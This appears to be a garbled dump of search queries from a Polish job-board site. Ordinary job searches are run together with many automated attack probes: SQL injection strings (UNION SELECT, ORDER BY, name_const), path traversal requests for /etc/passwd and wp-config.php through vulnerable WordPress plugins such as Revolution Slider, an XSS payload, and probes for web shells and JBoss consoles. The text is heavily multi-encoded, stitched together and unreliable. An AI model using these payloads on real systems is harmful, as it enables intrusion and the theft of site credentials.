warehouse/wp-login.php%27a%3d0%27a%3d0+and+1>1 tychykasjer+weekendykontrola+jakości opolekierowca++kat+c+union+all+select+concat%28concat%28%27qqzpq%27%2c%27qiujvebkgo%27%29%2c%27qbbvq%27%29%2cnull%2cnull%2cnull%2cnulbez+do%25c5%259bwiadczeniakierowca%25252bw%25252bwypo%2525c5%2525bcyczalni%25252bsamochodowej%25252b%252528m%252fk%252529 niemcypraca+dla+ucznia+wakacjeoperator produkcjipracownik restauracjitransport %257c spedycja zachodniopomorskieadministracja+biurowa%252527a%25253d0operator%2bw%c3%b3zka%2bwid%c5%82owego%27a%3d0pracownik produkcji pomorskiekierowca++kat+c+union+all+select+null,null--+gotnkierownik-branża betoniarskam%2525c5%252582odszy in%2525c5%2525bcynierbez%2bdo%25252525c5%252525259bwiadczeniapraca+pomoc+księgowe poznańasystent ds. ksi%2525c4%252599gowosciprzemysł | produkcja lublinpracownik+magazynowy+-+atrakcyjna+stawka+i+bezp%c5%82atny+dojazd/etc/passwd union all select null-- sgpgdekpol s.akierowca++kat+c+union+all+select+concat(concat('qqzpq','dlgzawmngd'),'qbbvq'),14,14,14,14,14,14--+gajwmonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.phpkierowca %2528m/k%2529 %2528kat. c%252be%252c hakowce%2529 warszawaprawnik język rosyjskikierowca++kat+c+union+all+select+null,null,null,null,concat(concat('qqzpq','gmxvpgchsgnfjygyyfigxdfivgkwzqnsookpltsf'),'qbbvq'),serwis | technika | montaż śląskiespecjalista ds. wdro%c5%bce%c5%84pomoc+kucharzaoperator w%25c3%25b3zka warszawakamieniec wrocławskipraca fizyczna sprz%252525c4%25252585taczkaspecjalista+ds.+rekrutacji warszawaangielski hiszpa%25c5%2584skiagile+product+owner+-+krak%c3%b3wkontrola%2bjako%25252525252525c5%252525252525259bci polskapracownik+fizyczny wrocławpracownik szklarnimonter pod%252525c5%25252582%252525c3%252525b3gbudownictwo%252b%25252525257c%252bgeodezjapracownik+dzia%25252525c5%2525252582u+hrprzemys%c5%82 %7c produkcja warszawapraca+bez+jezyka+magazyn niemcypracownik%2bgospodarczy niemcy/etc/passwd union all select null,null,null,null,null,null,null,null-- ibizopiekunka os%25c3%25b3b starszych niemcykierowca++kat+c+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+vyoesprzedaż | obsługa klienta zachodniopomorskiemonter+konstrukcji/wp-login.php%27a%3d0/07545460.php%27+and+%27x%27%3d%27ynowy tomyślpracownik%25252bprodukcji-bez-jezykamonter niemcypraca%25252bbiurowasap+abap+mmpodwykonawca p%25252525c5%2525252582ytky g%25252525c5%2525252582adzie malowaniekierowca+w+wypo%252525c5%252525bcyczalni+samochodowejmagazynier%25252525252cprodukcja%25252525252ckierowca%20kat.bwarehouse worker/wp-login.php%25252527a%2525253d0m%2525c5%252582odszy konsultant ds. rekrutacji %252528m/k%252529kontroler jakosci towarupraca+biurowa,+ochrona zawierciefinanse+|+bankowośćpracownik+montażu śląskieprocurements specialistin%2525c5%2525bcynier budowy warszawapracownik produkcji (m/k) niemcykierowca%25252bb%25252bbes%25252bznajosci%25252bjenzyka niemcykierownik ochronyniepe%25c5%2582ny+etatpracownik%2bdo%2bsortowania%2bowoc%2525252525252525c3%2525252525252525b3wkontrola%2525252bjako%25252525c5%252525259bci polskamonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider show image" and "xprocurements+specialist polandpraca%252bbez%252bznajomo%2525252525252525c5%25252525252525259bci%252bj%2525252525252525c4%252525252525252599zyka niemcykierowca+w+wypo%25c5%25bcyczalni+samochodowej+%28m/k%29pracownik+produkcji+spo%25252525c5%25252525bcywczej+%2525252528m/k%2525252529praca%252bogulnobudowlana niemcyangielski+hiszpa%2525c5%252584ski warszawakontroler jako%c5%9bci sosnowiecadministracja+hrpracownik powierzchni sprzeda%2525c5%2525bc%2525c4%252585specjalista+ds.+p%252525c5%25252582ac+i+kadr mazowieckiemonter konstrukcji/wp-login.php'a=0/07545460.php/wp-content/themes/nishizawa_tmp/force-download.php?file=../../../wp-config.phpmarketing %25257c reklama %25257c prpomoc+w+t%c5%82umaczeniach warszawakierowca kat c%2525%2527 union all select null%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull-- gylzmiędzyrzec+podlaskipraca dla osoby z orzeczeniem o niepełnosprawności warszawamechanik przemys%252525252525c5%25252525252582owy/ monterpracownik+obszaru+produkcji+(m/k)monter+konstrukcji/wp-login.php%27a%3d0/wp-content/plugins/revslider/temp/update_extractpraca%2525252bogulnobudowlana niemcypracownik+budowlanki niemcystudio/etc/passwd%25%27%2bunion%2ball%2bselect%2bnull%2cnull%2cnull%2cnull%2cnull--%2bxfcokierowca+c+e polskagnieznooperator+walcaspecjalista%2bds.%2bzakup%c3%b3win%c5%bcynier procesu spawaniaprodukcja dla niepełnosprawnych order by 1-- trsimonter+konstrukcji/wp-login.php'a=0/wp-admin'a=0konsultant+telefoniczny+ds.+sprzeda%2525252525c5%2525252525bcy+produkt%2525252525c3%2525252525b3w+bankowychdoradca%2bklienta%2bz%2bj%c4%99zykiem%2bniemieckimadministracja biurowa płockpraca+w+magazynie+niemcy+bez+znajomo%2525c5%25259bci+j%2525c4%252599zykaa+pilot+project+for+a+new+libertarian+floating+city+will+have+300+homes,+its+own+government,+and+its+own+cryptocurrencyspecjalista%2bds.%2bp%25252525c5%2525252582ac%2bi%2bkadradministracja%2bpa%25252525c5%2525252584stwow/etc/passwd%25%27 union all select null-- vzzrspecjalista+ds.+sprzeda%252525c5%252525bcykierowca++kat+c%2527+union+all+select+null%252cnull--+xkdasprzedaż | obsługa klienta tomaszów mazowieckiin%c5%bcynieria %7c projektowanie podkarpackiemagazynier,produkcja,kierowca kat.b niemcyprawospecjalista%2bds%2bsprzeda%2525c5%2525bcy%2bmieszka%2525c5%252584monter+konstrukcji/wp-login.php%252525252527a%25252525253d0/wp-admin/admin-ajax.php%25252525253faction%25252525253drevslider_shoopiekunka do dziecka lublint%252525c5%25252582umacz+j%252525c4%25252599zyka+migowegowarehouse/wp-login.php%27a%3d0%27a%3d0"+and+"x"="yoperator w%252525c3%252525b3zka wid%252525c5%25252582owego holandiaspecjalista ds kadr i p%2525c5%252582acnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/invoker/web-console/invokerreferent ds. administracji %2525252528m/k%2525252529t%c5%82umacz%2bangielskiegospecjalista ds. sprzeda%25c5%25bcy produkt%25c3%25b3w bankowych katowicekasjer weekendy krakówmonter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0+and+1%3d1+and+1%office%25252bassistantmonter konstrukcji//wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php%3ffilename%3d../../../../wp-config.phpkontrola%252525252bjako%25252525c5%252525259bcipracownik%2bmonta%2525252525c5%2525252525bcu%2b%252525252528m/k%252525252529agile+product+owner+-+krak%25c3%25b3wmonter+konstrukcji/wp-login.php%27a%3d0/wp-admin/mechanik przemys%2525c5%252582owy/ monterkierowca+%28m/k%29+%28kat.+c+e%2c+hakowce%29 niemcykonsultant+j%2525c4%252599zyk+angielski mazowieckie1 %d0%b7 154 %2cszuka pracy kierowcy c%2be pdw%c3%b3jna obsadamonter%252fka+element%25c3%25b3w+do+siedze%25c5%2584+samochodowych niemcykierowca kat b c1111111111111' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45)--praca bez znajomo%25252525c5%252525259bci j%25252525c4%2525252599zykatransport %2525257c spedycja%25252522 and %25252522x%25252522%2525253d%25252522y%25252527a%2525253d0pracownik%2525252bprodukcji-bez-jezyka-niemieckiego niemcyspecjalista%2bds%2bkar%2bi%2bp%25252525c5%2525252582acsprzeda%25252525c5%25252525bc+%252525257c+obs%25252525c5%2525252582uga+klienta pomorskieopeka osob starszychpracownik administracyjno-biurowy poznańczechypracownik magazynowy (m/k) krakówpracownik+biurowy oświęcimtechnolog+%c5%bcywnoscipraca wakacyjna tychypracownik dzia%2525c5%252582u obs%2525c5%252582ugi klienta warszawapomoc kuchenna, asystentki, cukirnik warszawaasystent/ka ds. administracji i obs%25252525c5%2525252582ugi klienta ze znajomo%25252525c5%252525259bci%25252525c4%2525252585 j%przedstawiciel handlowymagazynier%252525252cprodukcja%252525252ckierowca%2bkat.b mazowieckiedrewno cncprzemys%252525c5%25252582 %2525257c produkcja belgiakierowca+kat+c+eprodukcja lek%252525c3%252525b3wpraca%25252bzakwaterowaniem polskaauto detailerpracownik+myjni+samochodowej+(m/k) katowicepracownik do sortowania owoc%2525252525252525c3%2525252525252525b3wkłodzkoinżynier+budowy pomorskiepraca dla pa%2525c5%252584 i pan%2525c3%2525b3wwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy+and+1%3d1operator%25252bw%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w%25252bwid%2525252525c5%252525252582owych polskapracownik+do+sortowania+owoc%252525c3%252525b3w holandiamonter%2bkonstrukcji/wp-login.php%27a%3d0/07545460.php%27%2band%2b%27x%27%3d%27xlogistyka%2b%2525257c%2bdystrybucjaostrów wielkopolskikierownik+rob%25c3%25b3t+sanitarnychbadania+i+rozw%25c3%25b3j szczecinsprzedawca kasjerŻmigródkierowca++kat+c%252527+union+all+select+null%25252cnull%25252cnull%25252cnull%25252cnull--+ptuhhr%25252c%25252bkadrykonsultant+ds.+umawiania+spotka%c5%84praca+dla+osoby+z+orzeczeniem+o+niepełnosprawności warszawaprzemys%252525c5%25252582+%2525257c+produkcja+krojczymonter płyt gkoperator ładowarkiostrołękapraca fizyczna bez j%c4%99zykakierowca kat c union all select null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull-- wujgprzemys%2525c5%252582+%25257c+produkcja lublinoperator w%2525c3%2525b3zka wid%2525c5%252582owego wielkopolskiepraca%252bdla%252bparoperator+wózków+widłowychit sta%2525252525c5%2525252525bcmonter konstrukcji/wp-login.php%27a%3d0%27a%3d0kierowca dolnośląskiefizyczna%2ckierowca%2coperator%2c roznaasystent klienta%252c konsultanttechnik%2belektryk%2b%2525252525252528m/k%2525252525252529transport%2b%25257c%2bspedycja%2527a%253d0sprzedaż | obsługa klienta radlinkupiec+%28m/k%29wolakierownik+regionów warszawatransport%2b%7c%2bspedycja%27%2band%2b%27x%27%3d%27yz orzeczeniem szczecinprogramista c%23aterimamoszczenicaprzemysł | produkcja holandiapracownik+hali warszawaprzemys%25c5%2582 %257c produkcja pomorskiepomocnik %2525c5%25259bmieciarzatransport+%7c+spedycja zachodniopomorskiegastronomia-pomoc+kuchennamaków podhalańskinauczyciel+języka+niemieckiegobudownictwo%2b%7c%2bgeodezja%2bpomocnikprodukcja dla niepe%2525c5%252582nosprawnychpraca+popołudniami warszawaspecjalista%2bds.%2bplanowania%2bjako%252525c5%2525259bci%2b%25252528m/k%25252529pomoc+domowa warszawatransport %257c spedycja and 1%253e1kitchen+helperpraca+fizyczna+w+rolnictwie francjatransport %25257c spedycja and 1%253d1pomocnik%252b%25c5%259bmieciarzanauczyciel j%25c4%2599zyk niemieckikontroler jako%2525c5%25259bci %252528m/k%252529magazynier+(m/k)sortowacz odpad%2525c3%2525b3w komunalnychkierowca w wypo%25252525c5%25252525bcyczalni samochod%25252525c3%25252525b3wsprzedaż | obsługa klienta podkarpackiewarehouse/wp-login.php%2525252527a%252525253d0%2525252527a%252525253d0location%252525253dtychy%2525252527+and+%2525252527x%25252technik elektryk (m/k) kujawsko-pomorskiepraca%252bw%252bszpitalumonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0' and 'x'='y' and 'x'='xkierowca kat c union all select 14,14,14,14,14,14,concat(concat('qqzpq','wdpiggustl'),'qbbvq')-- uqjqkoordynator łańcucha dostawpakowacz+bez+języka niemcyasystentka stomatologiczbaasystent+klienta,+konsultant warszawajunior it warszawamonter%2bbateri%2bprzemys%c5%82owychspecjalista łódzkieoperator w%25c3%25b3zka wid%25c5%2582owego 20%252c23monter+konstrukcji/wp-login.php%252527a%25253d0/07545460.phpprodukcja dla niepe%25252525c5%2525252582nosprawnych%2525252527a%252525253d0administracja+państwow warszawapodw%25252525c3%25252525b3jna obsada kierowca c%252525252beproduct+photography warszawaenergetyka+%2525257c+elektronikamobilnatechnolog+%2525c5%2525bcywno%2525c5%25259bcimagazynier - nie wymagamy doświadczeniagrünberger personalvermittlungopiekun klienta toruńnauczyciel+j%2525c4%252599zyk+niemiecki/login.action/web-console/admin-console/login.seampraca wakacyjna zatoropiekunka+os%25c3%25b3b+starszychkonstruktor oprzyrz%c4%85dowaniaspecjalista%2bds%2brozlicze%252525252525c5%25252525252584monter+konstrukcji/wp-login.php%27a%3d0/07545460.php99999%22+union+select+unhex%28hex%28version%28%29%29%29+--+%22x%22%3d%22xpracownik+obszaru+produkcji+%2528m/k%2529monter konstrukcji%252fwp-login.php%2527a%253d0%252f07545460.php and 1%253d1%2527a%253d0monter statk%25c3%25b3wspecjalista ds kar i p%25c5%2582acРабота+с+персоналом+|+Кадрыsta%c5%bc+marketingmonter%2525252fka element%252525c3%252525b3w do siedze%252525c5%25252584 samochodowychmonter+bateri+przemys%c5%82owychwarehouse/wp-login.php%27a%3d0%27a%3d0'+and+'x'='ypraca+w+szpitalu warszawapraca ochrona wielkopolskiepraca%2b%2bfizyczna%2bbez%2bj%c4%99zykamonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1" and "x"="x1111111111111produkcja dla niepełnosprawnych union all select null,null,null,null,null,concat(0x7170627871,0x6a5141554e6869546e416c755073655kontrola%2bjako%25c5%259bci mazowieckiepraca%25252bbez%25252bznajomo%2525252525252525c5%25252525252525259bci%25252bj%2525252525252525c4%252525252525252599zykakierowca kat c%2527 union all select null%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull-- ljqhlubartówz%2bj%25c4%2599zykiem%2bw%25c5%2582oskimpakowanie+żywności sochaczewrecepcjonista+ka+medycznatweets+with+replies+by+eduardo+antonio+pasten+herrera+%28%40pasten_herrera%29+%7c+twitterpiekary Śląskiekierowca+w+wypo%2525c5%2525bcyczalni+samochodowej+%252528m%2fk%252529specjalista+ds.+obs%2525252525c5%252525252582ugi+klientalogistyka %257c dystrybucja niemcy/etc/passwd%'+union+all+select+null,null,null--+fyvmpraca bez znajomo%25252525252525c5%252525252525259bci j%25252525252525c4%2525252525252599zykakopiowanie%2c+skanowanietomaszów mazowieckikierowca%2b%2bkat%2bc%2bunion%2ball%2bselect%2b14%252c14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527mzmbbqqcwyzwtpyipxvrmonter konstrukcji/wp-login.php'a=0/07545460.php" and "x"="ywarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy2121121121212.1pomoc+nauczyciels warszawawarehouse/wp-login.php'a=0'a=0location=tychy' and 'x'='ypraca dla pa%25c5%2584 i pan%25c3%25b3wpracownik+powierzchni+sprzeda%c5%bc%c4%85logistyka %7c dystrybucjakierowca kat c union all select null-- zzoetechnik+informatyk pomorskiepomoc ksi%2525c4%252599gowa mazowieckiedoradca ds. sprzedaży samochodów nowychwprowadzanie danych warszawapraca%20%20fizyczna%20bez%20j%252525252525252525c4%25252525252525252599zykakierowca kat c%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- tvlbkierowca kat c%' union all select null,null,null,null,null,null-- bsym%d0%be%d1%85%d1%80%d0%b0%d0%bd%d0%b01%2b%25d0%25b7%2b154%2b%2b%2b%252cszuka%2bpracy%2bkierowcy%2bc%252be%2bpdw%25c3%25b3jna%2bobsadatechnolog przetw%c3%b3rstwa tworzywin%c5%bcynier elektronik %28m/k%29operator+wózka+widłowego+–+2+zmiany,+bez+doświadczeniapraca pomoc ksi%2525c4%252599gowejostrowiec+Świętokrzyskipobiedziskamonter konstrukcji/wp-login.php%27a%3d0/07545460.php99999%22 union select unhex%28hex%28version%28%29%29%29 -- %22x%22%3d%22x%27/etc/passwd%25%27%2bunion%2ball%2bselect%2bnull%2cnull%2cnull--%2bfyvmząbkowice+Śląskieksięgowościszukam pracy poznańjezyk francuski dolnośląskiein%c5%bcynier+budowy pomorskiezłocieniecpakowacz+bez+j%25c4%2599zyka niemcywarehouse/wp-login.php'a=0'a=0location=tychy"+and+"x"="'a=0monter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0+and+1%3d1%27%3e%kontroler jako%c5%9bcipraca%2bfizyczna%2bw%2brolnictwie niemcyoperator+w%252525c3%252525b3zka+wid%252525c5%25252582owego+%25252528m/k%25252529pracownik+produkcyjny wielkopolskapraca+tymczasowa belgiatechnik+dentystycznydyrektor administracyjnyfinanse%252b%257c%252bbankowo%25c5%259b%25c4%2587monter konstrukcji stalowychfrancuski+praca+zdalanmonter+konstrukcji/wp-login.php%252527a%25253d0/07545460.php%252527+or+%2525281%25252c2%252529%25253pracownik dzia%25252525c5%2525252582u hrgołdapmonter+konstrukcji/wp-login.php%2527a%253d0/wp-content/plugins/revslider/temp/update_extractkontrola jako%25252525252525252525c5%252525252525252525259bci polskakierowca kat ckasjer+weekendy krakówmonter konstrukcji/wp-login.php%27a%3d0/wp-content/plugins/revslider/temp/update_extractoperator%252bw%2525c3%2525b3zkanauczyciel+j%c4%99zyk+niemiecki mazowieckiesekretarka ze znajomo%2525c5%25259bci%2525c4%252585 j. angielskiegobrand managerpraca%2b%2bfizyczna%2bbez%2bj%252525c4%25252599zykaoperator cnc gdańskfrenchw+biurze+stowarzyszenie,+fundacja,+organizacje białystokmonter konstrukcji/wp-login.php%25252527a%2525253d0/wp-admin/admin-ajax.php%2525253faction%2525253drevslider_stechnik elektryk %2525252528m/k%2525252529 pomorskieprocess+engineer polandkierowca c e wielkopolskiestudent warszawamonter konstrukcji/wp-login.php%252525252527a%25252525253d0/wp-content/plugins/revslider/temp/update_extract/57758779.phpkierowca kat c%25%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- gylzpraca zdalna warszawapracownik biura wrocławtransport+%7c+spedycja+and+1%3d1bełżycetransport | spedycja mazowieckieautocad małopolskieoperator%2bw%2525c3%2525b3zka%2bwid%2525c5%252582owegomonter/ka+element%252525c3%252525b3w+do+siedze%252525c5%25252584+samochodowych niemcyustawiacz maszyn produkcyjnych - nie wymagamy do%c5%9bwiadczeniasekretarka%2c sekretarz%2c pracownik biurowy%2c pracownik dzia%c5%82u kadrpleszewtransport%2b%7c%2bspedycja2121121121212.1pracownik biu poznańsekretarka ze znajomo%25c5%259bci%25c4%2585 j. rosyjskiegosortowacz odpad%c3%b3w komunalnychkontrola+jako%252525c5%2525259bci polskapraca+przy+kwiatach niemcyoperator w%252525c3%252525b3zka wid%252525c5%25252582owego wielkopolskiesprzedaż | obsługa klienta kielcemasovian+voivodeship/etc/passwd+union+all+select+null,null,null,null,null,null,null--+mlfsmonter konstrukcji/wp-login.php%3cimgonmouseover%3d%22alert%28%27mysqlerror%27%29%22%3e%27a%3d0warehouse worker/wp-login.php%2527a%253d0logistyka+|+dystrybucja poznańkierowca kat c union all select concat(concat('qqzpq','qiujvebkgo'),'qbbvq'),null,null,null,null,null,null-- wpitaircraft mechanicБез опытаkonsultant telefoniczny łódźprzemysł | produkcja bytomnorwegiatransport %7c spedycja' and 'x'='yasystent ds. rekrutacjipiotrkówczęstochowakierowca%252bw%252bwypo%25c5%25bcyczalni%252bsamochodowej%252b%2528m%2fk%2529angielski hiszpa%25c5%2584ski warszawalogistyka+|+dystrybucja śląskieoperator wózkawarehouse/wp-login.php%25252527a%2525253d0%25252527a%2525253d0location%2525253dtychy+and+1%2525253e1asystent/ka ds. administracji i obs%c3%85%c2%82ugi klientanauczyciel j%2525c4%252599zyk francuskimonter konstrukcji/wp-login.php%2525252527a%252525253d0/wp-content/plugins/revslider/temp/update_extract/57758779.phppraca fizyczna bez j%25252525c4%2525252599zykabez j%c4%99zyka niemcypracownik+ochrony mazowieckieprodukcja+dla++niepe%25c5%2582nosprawnychnauczyciel język francuski warszawain%25c5%25bcynier budowy/wp-login.php or (1,2)=(select*from(select name_const(char(111,108,111,108,111,115,104,101,114),1),name_budownictwo%2b%2525252525257c%2bgeodezjapraca+8-16 wrocławspecjalista+ds.+jako%25c5%259bcitechnolog żywnościpraca%2bdla%2bucznia%2bwakacje%252527a%25253d0j%252525c4%25252599zyk%2bfrancuskisprzeda%2525c5%2525bc+%25257c+obs%2525c5%252582uga+klienta koszalinconstruction worker polandin%2525c5%2525bcynier+jako%2525c5%25259bciadministrator system%2525c3%2525b3wpracownik%2bdo%2bsortowania%2bowoc%252525252525252525c3%252525252525252525b3wkierowca pomorskieenergetyka %257c elektronikatransport | spedycja' and 'x'='ykierowca kat c union all select null%252cnull%252cnull%252cnull%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527gmxvpgchsgnfpracownik umys%2525c5%252582owy bytomtransport%2b%7c%2bspedycja%2band%2b1%3e1specjalista ds kar i p%25c5%2582ac wielkopolskiekiirowca kat b magazynier bolesławiecin%25252525c5%25252525bcynier budowy/wp-login.php%252527 or %2525281%25252c2%252529%25253d%252528select%25252afrom%252528select pomorskieadministracja biurowa radomgr%c3%bcnberger personalvermittlungumowa+o+prac%c4%99transport+%25257c+spedycja%2527+and+%2527x%2527%253d%2527ykontrola%252bjako%252525c5%2525259bcipraca sezonowa śląskieprzemys%252525c5%25252582+%2525257c+produkcjaspecjalista%2bw%2bszkoleadministracja%2bbiurowa%2527a%253d0korwek marcin f. h.u. eko-tech solki rajgr%25c3%25b3d barg%25c5%2582%25c3%25b3w ko%25c5%259bcielny.italiantransport+%257c+spedycja szczecinskładanie+lampochrona osób i mienia skawinaelektryk%252b%252525252528m/k%252525252529 pomorskieprodukcja dla niepełnosprawnych order by 1-- jygtpracownik monta%c5%bcu sosnowiecmonter konstrukcji/wp-login.php%27a%3d0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php%3nauczyciel+j%2525c4%252599zyk+niemiecki/login.actionmonter+rega%c5%82%c3%b3wmonter+konstrukcji/wp-login.php%27a%3d0/07545460.php%22+or+%281%2c2%29%3d%28select%2afrom%28select+name_const%28char%28111%2c108operator w%c3%b3zk%c3%b3w wid%c5%82owych polskapraca%2bfizyczna%2bbudowlany niemcytechnik weterynariisubcarpathian voivodeshippracownik do sortowania owoc%2525252525c3%2525252525b3wpraca bez znajomo%25252525c5%252525259bci j%25252525c4%2525252599zyka niemcypracownik produkcji szczecinasystent/ka ds. administracji i obs%25c5%2582ugi klienta ze znajomo%25c5%259bci%25c4%2585 j%25c4%2599zyka ruskiego warszawapracownik+magazynu łódzkietychyin%252525c5%252525bcynier+elektronik+%25252528m/k%25252529 lublinbudownictwo%2525252b%252525252525257c%2525252bgeodezjapracownik%25252bbudowlankimagazynier+-+nie+wymagamy+do%c5%9bwiadczenia%21kierowca kat c union all select null%2cnull%2cnull%2cnull%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27wmsiqvjkatqiwnbivqicnqvwzmanager+sprzedaży warszawaspecjalista ds. szkoleń/etc/passwd' union all select null,null,null,null,null-- lmxnpracownik+administracyjno-biurowy+z+orzeczeniem+o+niepełnosprawnościkierowca kat c union all select null,null-- tbxebudownictwo%25252525252b%2525252525252525257c%25252525252bgeodezja francjaprzedstawiciel+handlowy śląskieopieka+nad+psem'a=0sekretarka ze znajomo%2525c5%25259bci%2525c4%252585 j. niemieckiegoblacharz+samochodowy poznańkierowca+coperator w%25252525c3%25252525b3zka wid%25252525c5%2525252582owego katowicerolnictwo+|+ochrona+środowiska warszawaasystent+w+dziale+kadr+i+p%252525c5%25252582acmagazynier%252525252cprodukcja%252525252ckierowca kat.b%2527a%253d0specjalista+ds.+kadr+i+p%252525c5%25252582ac+%25252528m/k%25252529 wielkopolskiein%25252525c5%25252525bcynier+budowy/wp-login.php'a=0administracja pa%25252525c5%2525252584stwowapraca+pomoc+ksi%c4%99gowej warszawaprzemys%2525c5%252582+%25257c+produkcja gliwicekierowca w wypożyczalni samochodowej (m/k) podlaskietransport%2b%257c%2bspedycja%2522%2band%2b%2522x%2522%253d%2522y%2527a%253d0przemysł | produkcja krakówpracownik%2bprodukcji niemcyp%c5%82atno%c5%9bciprzemysł | produkcja dąbrowa górniczalogopeda,+dozorca,+pracownik+ochronyprodukcja%2bdla%2b%2bniepe%25c5%2582nosprawnychtrener siłowni'a=0kierowca%2bc%2525252be niemcykierowca++kat+c+union+all+select+14,14,14,concat(concat('qqzpq','xoirqgorcl'),'qbbvq'),14,14,14--+klbo" and "x"="xnauczyciel+języka+niemieckiego dolnośląskiepraca%25252525252bfizyczna%25252525252bw%25252525252brolnictwiebhp śląskiegreater+polandspecjalista+ds.+planowania+jako%c5%9bci+%28m/k%29kierowca %25252528m%252fk%25252529 %25252528kat. c%2525252be%2525252c hakowce%25252529specjalista%25252bds.%25252bp%252525252525c5%25252525252582ac%25252bi%25252bkadrpracownik+produkcji Świdnicawarehouse/wp-login.php'a=0'a=0'a=0praca biurowa, ochronapracownik%2bdo%2bwyk%252525c5%25252582adania%2btowarupraca+zdalna+dla+on-+wprowadzanie+danychkierowca w wypo%25252525c5%25252525bcyczalni samochodowejwarehouse/wp-login.php%252525252527a%25252525253d0%252525252527a%25252525253d0location%25252525253dtychy and 1%25252525253d1%252monter konstrukcji/wp-login.php%27a%3d0/07545460.php or %281%2c2%29%3d%28select%kolporter+ulotek lublinsteel germanyspecjalista+ds.+p%c5%82ac+i+kadr mazowieckiekierownik+budowy polskajunior product development polandmaszewospecjalista%2bds.%2bszkole%252525c5%25252584magazynier , budowlankanie+pełny+etatkierowca+kat+b warszawapraca+fabrykakierowca%252bw%252bwypo%25252525c5%25252525bcyczalni%252bsamochodowej%252b%2525252528m/k%2525252529 niemcykierowca%2bc%2be niemcykierowca kat c order by 7679-- uouepracownik gospodarczy niemcypracownik szklarni z og%252525c3%252525b3rkamimagazynier %2528m/k%2529 warszawasekretarka ze znajomo%252525c5%2525259bci%252525c4%25252585pomoc ksi%25c4%2599gowaoprator+wózka wrocławprojektowanie+wnętrzz+zamieszkaniem zakopanepraca+z+orzeczeniem+o+niepełnosprawności warszawapraca biurowa z orzeczeniem wrocŁawkierowca+%25252528kat.+c%2525252be%2525252c+hakowce%25252529sta%252525c5%252525bcysta w dziale rekrutacjipracownik+ochrony konstancin-jeziornakierowca%2525252bw%2525252bwypo%252525252525c5%252525252525bcyczalni%2525252bsamochodowej%2525252b%25252525252528m%252fk%2525252monter bateri przemysłowychasystent+dzia%252525c5%25252582u+zakup%252525c3%252525b3wasystent/ka ds. ksi%25c4%2599gowosci pomorskiesekretarka ze znajomo%25252525c5%252525259bci%25252525c4%2525252585przemys%c5%82 %7c produkcja krojczy pomorskieasystent+w+dziale+kadr+i+płacinformatyka administracjaenergetyka+%25257c+elektronikaprogramista+c#praca w teatrze krakówmonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0' and 'x'='y and 1>1warehouse/wp-login.php%25252527a%2525253d0%25252527a%2525253d0location%2525253dtychy%25252522+and+%25252522x%25252522%2525253d%2monter konstrukcji/wp-login.php%2527a%253d0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php%253faction%konsultant+język+angielski lublinksięgowość | audyt | podatkiaaaaaaaamedycyna | opieka zdrowotna opolskieconstruction engmedycyna+%2525257c+opieka+zdrowotnaaaaaaaaadoradca techniczny %25252525252528komponenty maszyn%25252525252529kontrola+jako%2525c5%25259bcimonter konstrukcji/wp-login.php'a=0/07545460.php and 1=1'a=0kierowca+w+wypo%c5%bcyczalni+samochodowej+%28m/k%29kontrola%2bjako%c5%9bcipomoc kuchenna małopolskiespecjalista ds. kadr i rekrutacji %252525252528m/k%252525252529operator+maszyn tychytechnolo konstrukcji/enterso.info/wp-login.php'transport%2b%257c%2bspedycja zachodniopomorskietransport %257c spedycja%2522 and %2522x%2522%253d%2522y%2527a%253d0montażpraca+dla+osób+z+orzeczeniem+o+niepełnosprawnościpraca pracownicy wykonuj%2525c4%252585cy prace prostetransport %25257c spedycja%252527a%25253d0 warszawapraca+zdalna/operator+wprowadzania+danychspecjalista+ds.+ekspansjinorwaypracownik sklepu odzieżowego (m/k)kożuchówmonter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3dbez+doświadczeniamonter+konstrukcji/wp...//wp-admin/admin-ajax.php%3faction%3drevslider_show_imagejunior front end developer warszawamonter konstrukcji/wp-login.php%2525252527a%252525253d0/wp-content/uploads/51217766.phpszwajcariaprojektowanie graficzmnewarszawa'specjalista+ds.+ksi%25c4%2599gowo%25c5%259bcimszana dolnajunior+front-end warszawaprodukcja dla niepełnosprawnych%' union all select null,null,null#kierowca w wypo%2525c5%2525bcyczalni samochodowej %252528m%252fk%252529 niemcykonstruktor oprzyrządowaniapraca dla ucznia wakacje%252527a%25253d0%d0%9c%d0%b5%d1%85%d0%b0%d0%bd%d0%b8%d0%ba+%d1%88%d0%b2%d0%b5%d0%b9%d0%bd%d1%8b%d1%85+%d0%bc%d0%b0%d1%88%d0%b8%d0%bdspecjalista ds. zakup%c3%b3wadministracja pa%c5%84stwowa warszawamonter+konstrukcji/wp-login.php%25252527a%2525253d0/license.phpmalborkpraca%2bfizyczna%2bsprz%c4%85taczka szczecinzdalna pracaserwis %2525257c technika %2525257c monta%252525c5%252525bcoperator walcaenglish poznańkierowca kat badministracja 